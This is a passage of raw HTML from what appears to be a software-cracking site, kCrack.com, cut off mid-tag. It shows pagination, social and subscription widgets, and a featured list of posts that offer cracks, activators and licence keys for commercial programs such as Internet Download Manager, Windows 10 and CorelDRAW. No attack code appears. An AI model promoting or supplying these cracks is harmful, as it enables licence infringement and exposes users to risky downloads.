href='https://kcrack.com/page/2/'>2</a></li> <li><a class='page-numbers' href='https://kcrack.com/page/3/'>3</a></li> <li><a class='page-numbers' href='https://kcrack.com/page/4/'>4</a></li> <li><span class="page-numbers dots">&hellip;</span></li> <li><a class='page-numbers' href='https://kcrack.com/page/24/'>24</a></li> <li><a class='page-numbers' href='https://kcrack.com/page/25/'>25</a></li> <li><a class='page-numbers' href='https://kcrack.com/page/26/'>26</a></li> <li><a class="next page-numbers" href="https://kcrack.com/page/2/"><i class="fa fa-chevron-right"></i></a></li> </ul> </nav> </div> <div class="main-sidebar col-lg-3 col-md-4 col-sm-5 col-xs-12 pl-0 pr-0"> <aside id="secondary" class="widget-area"> <section id="wpcom_social_media_icons_widget-2" class="widget widget_wpcom_social_media_icons_widget"><h2 class="widget-title">Follow Us On Social</h2><ul><li><a href="https://www.facebook.com/SadeemWorld/" class="genericon genericon-facebook" target="_blank"><span class="screen-reader-text">View SadeemWorld&#8217;s profile on Facebook</span></a></li><li><a href="https://www.pinterest.com/TricksHOME/" class="genericon genericon-pinterest" target="_blank"><span class="screen-reader-text">View TricksHOME&#8217;s profile on Pinterest</span></a></li><li><a href="https://www.youtube.com/user/SadeemTechPro/" class="genericon genericon-youtube" target="_blank"><span class="screen-reader-text">View SadeemTechPro&#8217;s profile on YouTube</span></a></li><li><a href="https://plus.google.com/u/0/+SadeemPc/" class="genericon genericon-googleplus" target="_blank"><span class="screen-reader-text">View SadeemPc&#8217;s profile on Google+</span></a></li><li><a href="https://kcrackposts.tumblr.com/" class="genericon genericon-tumblr" target="_blank"><span class="screen-reader-text">Tumblr</span></a></li></ul></section><section id="blog_subscription-2" class="widget widget_blog_subscription jetpack_subscription_widget"><h2 class="widget-title">Subscribe to kCrack.com via Email</h2> <form action="#" method="post" accept-charset="utf-8" id="subscribe-blog-blog_subscription-2"> <div id="subscribe-text"><p>Enter your email address to subscribe to this blog and receive notifications of new posts by email.</p> </div><p>Join 172 other subscribers</p> <p id="subscribe-email"> <label id="jetpack-subscribe-label" class="screen-reader-text" for="subscribe-field-blog_subscription-2"> Email Address </label> <input type="email" name="email" required="required" class="required" value="" id="subscribe-field-blog_subscription-2" placeholder="Email Address" /> </p> <p id="subscribe-submit"> <input type="hidden" name="action" value="subscribe" /> <input type="hidden" name="source" value="https://kcrack.com/" /> <input type="hidden" name="sub-type" value="widget" /> <input type="hidden" name="redirect_fragment" value="blog_subscription-2" /> <button type="submit" name="jetpack_subscriptions_widget"> Subscribe </button> </p> </form> </section><section id="facebook-likebox-2" class="widget widget_facebook_likebox"><h2 class="widget-title"><a href="https://www.facebook.com/SadeemWorld">Like Us On Facebook</a></h2> <div id="fb-root"></div> <div class="fb-page" data-href="https://www.facebook.com/SadeemWorld" data-width="340" data-height="130" data-hide-cover="false" data-show-facepile="false" data-show-posts="false"> <div class="fb-xfbml-parse-ignore"><blockquote cite="https://www.facebook.com/SadeemWorld"><a href="https://www.facebook.com/SadeemWorld">Like Us On Facebook</a></blockquote></div> </div> </section> <div id="stylo-stylo_fdeatured_posts_widget-2" class="widget stylo-featured-posts"> <h3 class="widget-title">Featured Software&#039;s</h3> <div class="widget-content"> <div class="widget-featured-post-thumb mb-10 pl-5 pt-5 pr-5 col-lg-2 col-md-3 col-sm-3 col-xs-3"> <a href="https://kcrack.com/idm-crack/" title="Internet Download Manager 6.33 Build 2 Crack ! [No Patch]"> <img width="150" height="150" src="https://i2.wp.com/kcrack.com/wp-content/uploads/2019/03/Internet-Download-Manager-crack.png?resize=150%2C150&amp;ssl=1" class="attachment-thumbnail size-thumbnail wp-post-image" alt="Internet Download Manager crack" srcset="https://i2.wp.com/kcrack.com/wp-content/uploads/2019/03/Internet-Download-Manager-crack.png?resize=150%2C150&amp;ssl=1 150w, https://i2.wp.com/kcrack.com/wp-content/uploads/2019/03/Internet-Download-Manager-crack.png?zoom=2&amp;resize=150%2C150&amp;ssl=1 300w" sizes="(max-width: 150px) 100vw, 150px" data-attachment-id="2840" data-permalink="https://kcrack.com/idm-crack/internet-download-manager-crack/" data-orig-file="https://i2.wp.com/kcrack.com/wp-content/uploads/2019/03/Internet-Download-Manager-crack.png?fit=362%2C472&amp;ssl=1" data-orig-size="362,472" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="Internet Download Manager crack" data-image-description="" data-medium-file="https://i2.wp.com/kcrack.com/wp-content/uploads/2019/03/Internet-Download-Manager-crack.png?fit=230%2C300&amp;ssl=1" data-large-file="https://i2.wp.com/kcrack.com/wp-content/uploads/2019/03/Internet-Download-Manager-crack.png?fit=362%2C472&amp;ssl=1" /> </a> </div> <div class="widget-featured-post-thumb mb-10 pl-5 pt-5 pr-5 col-lg-2 col-md-3 col-sm-3 col-xs-3"> <a href="https://kcrack.com/mini-kms-activator-ultimate-crack/" title="Mini KMS Activator Ultimate 1.5 With Crack"> <img width="150" height="150" src="https://i2.wp.com/kcrack.com/wp-content/uploads/2019/05/Mini-KMS-Activator-Ultimate-Crack.png?resize=150%2C150&amp;ssl=1" class="attachment-thumbnail size-thumbnail wp-post-image" alt="Mini KMS Activator Ultimate Crack" data-attachment-id="3213" data-permalink="https://kcrack.com/mini-kms-activator-ultimate-crack/mini-kms-activator-ultimate-crack/" data-orig-file="https://i2.wp.com/kcrack.com/wp-content/uploads/2019/05/Mini-KMS-Activator-Ultimate-Crack.png?fit=201%2C287&amp;ssl=1" data-orig-size="201,287" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="Mini KMS Activator Ultimate Crack" data-image-description="" data-medium-file="https://i2.wp.com/kcrack.com/wp-content/uploads/2019/05/Mini-KMS-Activator-Ultimate-Crack.png?fit=201%2C287&amp;ssl=1" data-large-file="https://i2.wp.com/kcrack.com/wp-content/uploads/2019/05/Mini-KMS-Activator-Ultimate-Crack.png?fit=201%2C287&amp;ssl=1" /> </a> </div> <div class="widget-featured-post-thumb mb-10 pl-5 pt-5 pr-5 col-lg-2 col-md-3 col-sm-3 col-xs-3"> <a href="https://kcrack.com/windows-10-digital-license-ultimate-with/" title="Windows 10 Digital License Ultimate 1.2 Crack With"> <img width="150" height="150" src="https://i0.wp.com/kcrack.com/wp-content/uploads/2019/05/Windows-10-Digital-License-Ultimate-Crack.jpg?resize=150%2C150&amp;ssl=1" class="attachment-thumbnail size-thumbnail wp-post-image" alt="Windows 10 Digital License Ultimate Crack" srcset="https://i0.wp.com/kcrack.com/wp-content/uploads/2019/05/Windows-10-Digital-License-Ultimate-Crack.jpg?resize=150%2C150&amp;ssl=1 150w, https://i0.wp.com/kcrack.com/wp-content/uploads/2019/05/Windows-10-Digital-License-Ultimate-Crack.jpg?zoom=2&amp;resize=150%2C150&amp;ssl=1 300w" sizes="(max-width: 150px) 100vw, 150px" data-attachment-id="3204" data-permalink="https://kcrack.com/windows-10-digital-license-ultimate-with/windows-10-digital-license-ultimate-crack/" data-orig-file="https://i0.wp.com/kcrack.com/wp-content/uploads/2019/05/Windows-10-Digital-License-Ultimate-Crack.jpg?fit=430%2C450&amp;ssl=1" data-orig-size="430,450" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="Windows 10 Digital License Ultimate Crack" data-image-description="" data-medium-file="https://i0.wp.com/kcrack.com/wp-content/uploads/2019/05/Windows-10-Digital-License-Ultimate-Crack.jpg?fit=287%2C300&amp;ssl=1" data-large-file="https://i0.wp.com/kcrack.com/wp-content/uploads/2019/05/Windows-10-Digital-License-Ultimate-Crack.jpg?fit=430%2C450&amp;ssl=1" /> </a> </div> <div class="widget-featured-post-thumb mb-10 pl-5 pt-5 pr-5 col-lg-2 col-md-3 col-sm-3 col-xs-3"> <a href="https://kcrack.com/veritas-backup-exec-crack/" title="Veritas Backup Exec 20.4.1188.2217 with Crack"> <img width="150" height="150" src="https://i2.wp.com/kcrack.com/wp-content/uploads/2019/05/Veritas-Backup-Exec-Crack.jpg?resize=150%2C150&amp;ssl=1" class="attachment-thumbnail size-thumbnail wp-post-image" alt="Veritas Backup Exec Crack" srcset="https://i2.wp.com/kcrack.com/wp-content/uploads/2019/05/Veritas-Backup-Exec-Crack.jpg?resize=150%2C150&amp;ssl=1 150w, https://i2.wp.com/kcrack.com/wp-content/uploads/2019/05/Veritas-Backup-Exec-Crack.jpg?zoom=2&amp;resize=150%2C150&amp;ssl=1 300w" sizes="(max-width: 150px) 100vw, 150px" data-attachment-id="3192" data-permalink="https://kcrack.com/veritas-backup-exec-crack/veritas-backup-exec-crack/" data-orig-file="https://i2.wp.com/kcrack.com/wp-content/uploads/2019/05/Veritas-Backup-Exec-Crack.jpg?fit=417%2C500&amp;ssl=1" data-orig-size="417,500" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="Veritas Backup Exec Crack" data-image-description="" data-medium-file="https://i2.wp.com/kcrack.com/wp-content/uploads/2019/05/Veritas-Backup-Exec-Crack.jpg?fit=250%2C300&amp;ssl=1" data-large-file="https://i2.wp.com/kcrack.com/wp-content/uploads/2019/05/Veritas-Backup-Exec-Crack.jpg?fit=417%2C500&amp;ssl=1" /> </a> </div> <div class="widget-featured-post-thumb mb-10 pl-5 pt-5 pr-5 col-lg-2 col-md-3 col-sm-3 col-xs-3"> <a href="https://kcrack.com/utorrent-pro-crack/" title="µTorrent Pro 3.5.5 Build 45231 With Crack"> <img width="150" height="150" src="https://i0.wp.com/kcrack.com/wp-content/uploads/2018/07/uTorrent-Pro-Crack-Full-Version.png?resize=150%2C150&amp;ssl=1" class="attachment-thumbnail size-thumbnail wp-post-image" alt="uTorrent Pro Crack Full Version" data-attachment-id="1121" data-permalink="https://kcrack.com/utorrent-pro-crack/utorrent-pro-crack-full-version/" data-orig-file="https://i0.wp.com/kcrack.com/wp-content/uploads/2018/07/uTorrent-Pro-Crack-Full-Version.png?fit=210%2C284&amp;ssl=1" data-orig-size="210,284" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="uTorrent Pro Crack Full Version" data-image-description="" data-medium-file="https://i0.wp.com/kcrack.com/wp-content/uploads/2018/07/uTorrent-Pro-Crack-Full-Version.png?fit=210%2C284&amp;ssl=1" data-large-file="https://i0.wp.com/kcrack.com/wp-content/uploads/2018/07/uTorrent-Pro-Crack-Full-Version.png?fit=210%2C284&amp;ssl=1" /> </a> </div> <div class="widget-featured-post-thumb mb-10 pl-5 pt-5 pr-5 col-lg-2 col-md-3 col-sm-3 col-xs-3"> <a href="https://kcrack.com/iperius-backup-full-crack/" title="Iperius Backup Full 6.1.0 With Crack"> <img width="150" height="150" src="https://i0.wp.com/kcrack.com/wp-content/uploads/2019/05/Iperius-Backup-Full-Crack.png?resize=150%2C150&amp;ssl=1" class="attachment-thumbnail size-thumbnail wp-post-image" alt="Iperius Backup Full Crack" srcset="https://i0.wp.com/kcrack.com/wp-content/uploads/2019/05/Iperius-Backup-Full-Crack.png?resize=150%2C150&amp;ssl=1 150w, https://i0.wp.com/kcrack.com/wp-content/uploads/2019/05/Iperius-Backup-Full-Crack.png?zoom=2&amp;resize=150%2C150&amp;ssl=1 300w, https://i0.wp.com/kcrack.com/wp-content/uploads/2019/05/Iperius-Backup-Full-Crack.png?zoom=3&amp;resize=150%2C150&amp;ssl=1 450w" sizes="(max-width: 150px) 100vw, 150px" data-attachment-id="3113" data-permalink="https://kcrack.com/iperius-backup-full-crack/iperius-backup-full-crack-2/" data-orig-file="https://i0.wp.com/kcrack.com/wp-content/uploads/2019/05/Iperius-Backup-Full-Crack.png?fit=491%2C449&amp;ssl=1" data-orig-size="491,449" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="Iperius Backup Full Crack" data-image-description="" data-medium-file="https://i0.wp.com/kcrack.com/wp-content/uploads/2019/05/Iperius-Backup-Full-Crack.png?fit=300%2C274&amp;ssl=1" data-large-file="https://i0.wp.com/kcrack.com/wp-content/uploads/2019/05/Iperius-Backup-Full-Crack.png?fit=491%2C449&amp;ssl=1" /> </a> </div> <div class="widget-featured-post-thumb mb-10 pl-5 pt-5 pr-5 col-lg-2 col-md-3 col-sm-3 col-xs-3"> <a href="https://kcrack.com/unhackme-crack/" title="UnHackMe 9.70 Build 670 With Crack"> <img width="150" height="150" src="https://i2.wp.com/kcrack.com/wp-content/uploads/2018/03/UnHackMe-Full-Version-Cracked.jpg?resize=150%2C150&amp;ssl=1" class="attachment-thumbnail size-thumbnail wp-post-image" alt="UnHackMe Full Version Cracked" srcset="https://i2.wp.com/kcrack.com/wp-content/uploads/2018/03/UnHackMe-Full-Version-Cracked.jpg?resize=150%2C150&amp;ssl=1 150w, https://i2.wp.com/kcrack.com/wp-content/uploads/2018/03/UnHackMe-Full-Version-Cracked.jpg?zoom=2&amp;resize=150%2C150&amp;ssl=1 300w" sizes="(max-width: 150px) 100vw, 150px" data-attachment-id="372" data-permalink="https://kcrack.com/unhackme-crack/unhackme-full-version-cracked/" data-orig-file="https://i2.wp.com/kcrack.com/wp-content/uploads/2018/03/UnHackMe-Full-Version-Cracked.jpg?fit=375%2C500&amp;ssl=1" data-orig-size="375,500" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="UnHackMe Full Version Cracked" data-image-description="" data-medium-file="https://i2.wp.com/kcrack.com/wp-content/uploads/2018/03/UnHackMe-Full-Version-Cracked.jpg?fit=225%2C300&amp;ssl=1" data-large-file="https://i2.wp.com/kcrack.com/wp-content/uploads/2018/03/UnHackMe-Full-Version-Cracked.jpg?fit=375%2C500&amp;ssl=1" /> </a> </div> <div class="widget-featured-post-thumb mb-10 pl-5 pt-5 pr-5 col-lg-2 col-md-3 col-sm-3 col-xs-3"> <a href="https://kcrack.com/chief-architect-premier-crack/" title="Chief Architect Premier Interiors X11 v21.2.0.48 With Crack"> <img width="150" height="150" src="https://i2.wp.com/kcrack.com/wp-content/uploads/2018/06/Chief-Architect-Premier-Full-Version-Cracked.png?resize=150%2C150&amp;ssl=1" class="attachment-thumbnail size-thumbnail wp-post-image" alt="Chief Architect Premier Full Version Cracked" srcset="https://i2.wp.com/kcrack.com/wp-content/uploads/2018/06/Chief-Architect-Premier-Full-Version-Cracked.png?resize=150%2C150&amp;ssl=1 150w, https://i2.wp.com/kcrack.com/wp-content/uploads/2018/06/Chief-Architect-Premier-Full-Version-Cracked.png?zoom=2&amp;resize=150%2C150&amp;ssl=1 300w" sizes="(max-width: 150px) 100vw, 150px" data-attachment-id="562" data-permalink="https://kcrack.com/chief-architect-premier-crack/chief-architect-premier-full-version-cracked/" data-orig-file="https://i2.wp.com/kcrack.com/wp-content/uploads/2018/06/Chief-Architect-Premier-Full-Version-Cracked.png?fit=327%2C420&amp;ssl=1" data-orig-size="327,420" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="Chief Architect Premier Full Version Cracked" data-image-description="" data-medium-file="https://i2.wp.com/kcrack.com/wp-content/uploads/2018/06/Chief-Architect-Premier-Full-Version-Cracked.png?fit=234%2C300&amp;ssl=1" data-large-file="https://i2.wp.com/kcrack.com/wp-content/uploads/2018/06/Chief-Architect-Premier-Full-Version-Cracked.png?fit=327%2C420&amp;ssl=1" /> </a> </div> <div class="widget-featured-post-thumb mb-10 pl-5 pt-5 pr-5 col-lg-2 col-md-3 col-sm-3 col-xs-3"> <a href="https://kcrack.com/advanced-systemcare-ultimate-crack/" title="Advanced SystemCare Ultimate 12.1.0.120 With Crack"> <img width="150" height="150" src="https://i1.wp.com/kcrack.com/wp-content/uploads/2018/05/Advanced-SystemCare-Ultimate-11-License-Key-e1527261485133.png?resize=150%2C150&amp;ssl=1" class="attachment-thumbnail size-thumbnail wp-post-image" alt="Advanced SystemCare Ultimate 11 License Key" srcset="https://i1.wp.com/kcrack.com/wp-content/uploads/2018/05/Advanced-SystemCare-Ultimate-11-License-Key-e1527261485133.png?resize=150%2C150&amp;ssl=1 150w, https://i1.wp.com/kcrack.com/wp-content/uploads/2018/05/Advanced-SystemCare-Ultimate-11-License-Key-e1527261485133.png?zoom=2&amp;resize=150%2C150&amp;ssl=1 300w, https://i1.wp.com/kcrack.com/wp-content/uploads/2018/05/Advanced-SystemCare-Ultimate-11-License-Key-e1527261485133.png?zoom=3&amp;resize=150%2C150&amp;ssl=1 450w" sizes="(max-width: 150px) 100vw, 150px" data-attachment-id="517" data-permalink="https://kcrack.com/advanced-systemcare-ultimate-crack/advanced-systemcare-ultimate-11-license-key/" data-orig-file="https://i1.wp.com/kcrack.com/wp-content/uploads/2018/05/Advanced-SystemCare-Ultimate-11-License-Key-e1527261485133.png?fit=650%2C752&amp;ssl=1" data-orig-size="650,752" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="Advanced SystemCare Ultimate 11 License Key" data-image-description="" data-medium-file="https://i1.wp.com/kcrack.com/wp-content/uploads/2018/05/Advanced-SystemCare-Ultimate-11-License-Key-e1527261485133.png?fit=259%2C300&amp;ssl=1" data-large-file="https://i1.wp.com/kcrack.com/wp-content/uploads/2018/05/Advanced-SystemCare-Ultimate-11-License-Key-e1527261485133.png?fit=640%2C740&amp;ssl=1" /> </a> </div> <div class="widget-featured-post-thumb mb-10 pl-5 pt-5 pr-5 col-lg-2 col-md-3 col-sm-3 col-xs-3"> <a href="https://kcrack.com/magix-acid-pro-next-suite-1-0-1-17-x86-with-crack/" title="MAGIX ACID Pro Next Suite 1.0.1.17 (x86) With Crack"> <img width="150" height="150" src="https://i2.wp.com/kcrack.com/wp-content/uploads/2019/05/MAGIX-ACID-Pro-Next-Suite-CRACK.jpg?resize=150%2C150&amp;ssl=1" class="attachment-thumbnail size-thumbnail wp-post-image" alt="MAGIX ACID Pro Next Suite CRACK" data-attachment-id="3046" data-permalink="https://kcrack.com/magix-acid-pro-next-suite-1-0-1-17-x86-with-crack/magix-acid-pro-next-suite-crack/" data-orig-file="https://i2.wp.com/kcrack.com/wp-content/uploads/2019/05/MAGIX-ACID-Pro-Next-Suite-CRACK.jpg?fit=242%2C342&amp;ssl=1" data-orig-size="242,342" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="MAGIX ACID Pro Next Suite CRACK" data-image-description="" data-medium-file="https://i2.wp.com/kcrack.com/wp-content/uploads/2019/05/MAGIX-ACID-Pro-Next-Suite-CRACK.jpg?fit=212%2C300&amp;ssl=1" data-large-file="https://i2.wp.com/kcrack.com/wp-content/uploads/2019/05/MAGIX-ACID-Pro-Next-Suite-CRACK.jpg?fit=242%2C342&amp;ssl=1" /> </a> </div> <div class="widget-featured-post-thumb mb-10 pl-5 pt-5 pr-5 col-lg-2 col-md-3 col-sm-3 col-xs-3"> <a href="https://kcrack.com/avira-antivirus-pro-crack/" title="Avira Antivirus Pro 15.0.36.180 + Lifetime License Key"> <img width="150" height="150" src="https://i0.wp.com/kcrack.com/wp-content/uploads/2018/05/Avira-Antivirus-Pro-Full-Cracked-e1527332019145.png?resize=150%2C150&amp;ssl=1" class="attachment-thumbnail size-thumbnail wp-post-image" alt="Avira Antivirus Pro Full Cracked" srcset="https://i0.wp.com/kcrack.com/wp-content/uploads/2018/05/Avira-Antivirus-Pro-Full-Cracked-e1527332019145.png?resize=150%2C150&amp;ssl=1 150w, https://i0.wp.com/kcrack.com/wp-content/uploads/2018/05/Avira-Antivirus-Pro-Full-Cracked-e1527332019145.png?zoom=2&amp;resize=150%2C150&amp;ssl=1 300w" sizes="(max-width: 150px) 100vw, 150px" data-attachment-id="529" data-permalink="https://kcrack.com/avira-antivirus-pro-crack/avira-antivirus-pro-full-cracked/" data-orig-file="https://i0.wp.com/kcrack.com/wp-content/uploads/2018/05/Avira-Antivirus-Pro-Full-Cracked-e1527332019145.png?fit=411%2C598&amp;ssl=1" data-orig-size="411,598" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="Avira Antivirus Pro Full Cracked" data-image-description="" data-medium-file="https://i0.wp.com/kcrack.com/wp-content/uploads/2018/05/Avira-Antivirus-Pro-Full-Cracked-e1527332019145.png?fit=206%2C300&amp;ssl=1" data-large-file="https://i0.wp.com/kcrack.com/wp-content/uploads/2018/05/Avira-Antivirus-Pro-Full-Cracked-e1527332019145.png?fit=411%2C598&amp;ssl=1" /> </a> </div> <div class="widget-featured-post-thumb mb-10 pl-5 pt-5 pr-5 col-lg-2 col-md-3 col-sm-3 col-xs-3"> <a href="https://kcrack.com/coreldraw-graphics-suite-crack/" title="CorelDRAW Graphics Suite 2019 v21.1.0.643 With Crack"> <img width="150" height="150" src="https://i2.wp.com/kcrack.com/wp-content/uploads/2019/03/CorelDRAW-Graphics-Suite-Crack.png?resize=150%2C150&amp;ssl=1" class="attachment-thumbnail size-thumbnail wp-post-image" alt="CorelDRAW Graphics Suite Crack" srcset="https://i2.wp.com/kcrack.com/wp-content/uploads/2019/03/CorelDRAW-Graphics-Suite-Crack.png?resize=150%2C150&amp;ssl=1 150w, https://i2.wp.com/kcrack.com/wp-content/uploads/2019/03/CorelDRAW-Graphics-Suite-Crack.png?zoom=2&amp;resize=150%2C150&amp;ssl=1 300w" sizes="(max-width: 150px) 100vw, 150px" data-attachment-id="2138" data-permalink="https://kcrack.com/coreldraw-graphics-suite-crack/coreldraw-graphics-suite-crack/" data-orig-file="https://i2.wp.com/kcrack.com/wp-content/uploads/2019/03/CorelDRAW-Graphics-Suite-Crack.png?fit=350%2C470&amp;ssl=1" data-orig-size="350,470" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="CorelDRAW Graphics Suite Crack" data-image-description="" data-medium-file="https://i2.wp.com/kcrack.com/wp-content/uploads/2019/03/CorelDRAW-Graphics-Suite-Crack.png?fit=223%2C300&amp;ssl=1" data-large-file="https://i2.wp.com/kcrack.com/wp-content/uploads/2019/03/CorelDRAW-Graphics-Suite-Crack.png?fit=350%2C470&amp;ssl=1" /> </a> </div> <div class="widget-featured-post-thumb mb-10 pl-5 pt-5 pr-5 col-lg-2 col-md-3 col-sm-3 col-xs-3"> <a href="https://kcrack.com/whatsender-pro-crack/" title="WHATSENDER Pro 4.6 With Crack"> <img width="150" height="150" src="https://i0.wp.com/kcrack.com/wp-content/uploads/2019/05/WHATSENDER-Pro-crack-e1556786679209.png?resize=150%2C150&amp;ssl=1" class="attachment-thumbnail size-thumbnail wp-post-image" alt="WHATSENDER Pro crack" srcset="https://i0.wp.com/kcrack.com/wp-content/uploads/2019/05/WHATSENDER-Pro-crack-e1556786679209.png?resize=150%2C150&amp;ssl=1 150w, https://i0.wp.com/kcrack.com/wp-content/uploads/2019/05/WHATSENDER-Pro-crack-e1556786679209.png?zoom=2&amp;resize=150%2C150&amp;ssl=1 300w" sizes="(max-width: 150px) 100vw, 150px" data-attachment-id="2937" data-permalink="https://kcrack.com/whatsender-pro-crack/whatsender-pro-crack/" data-orig-file="https://i0.wp.com/kcrack.com/wp-content/uploads/2019/05/WHATSENDER-Pro-crack-e1556786679209.png?fit=381%2C511&amp;ssl=1" data-orig-size="381,511" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="WHATSENDER Pro crack" data-image-description="" data-medium-file="https://i0.wp.com/kcrack.com/wp-content/uploads/2019/05/WHATSENDER-Pro-crack-e1556786679209.png?fit=224%2C300&amp;ssl=1" data-large-file="https://i0.wp.com/kcrack.com/wp-content/uploads/2019/05/WHATSENDER-Pro-crack-e1556786679209.png?fit=381%2C511&amp;ssl=1" /> </a> </div> <div class="widget-featured-post-thumb mb-10 pl-5 pt-5 pr-5 col-lg-2 col-md-3 col-sm-3 col-xs-3"> <a href="https://kcrack.com/mirillis-action-crack/" title="Mirillis Action 3.9.3 With Crack"> <img width="150" height="150" src="https://i0.wp.com/kcrack.com/wp-content/uploads/2018/05/Mirillis-Action-Crack.png?resize=150%2C150&amp;ssl=1" class="attachment-thumbnail size-thumbnail wp-post-image" alt="Mirillis Action Crack" 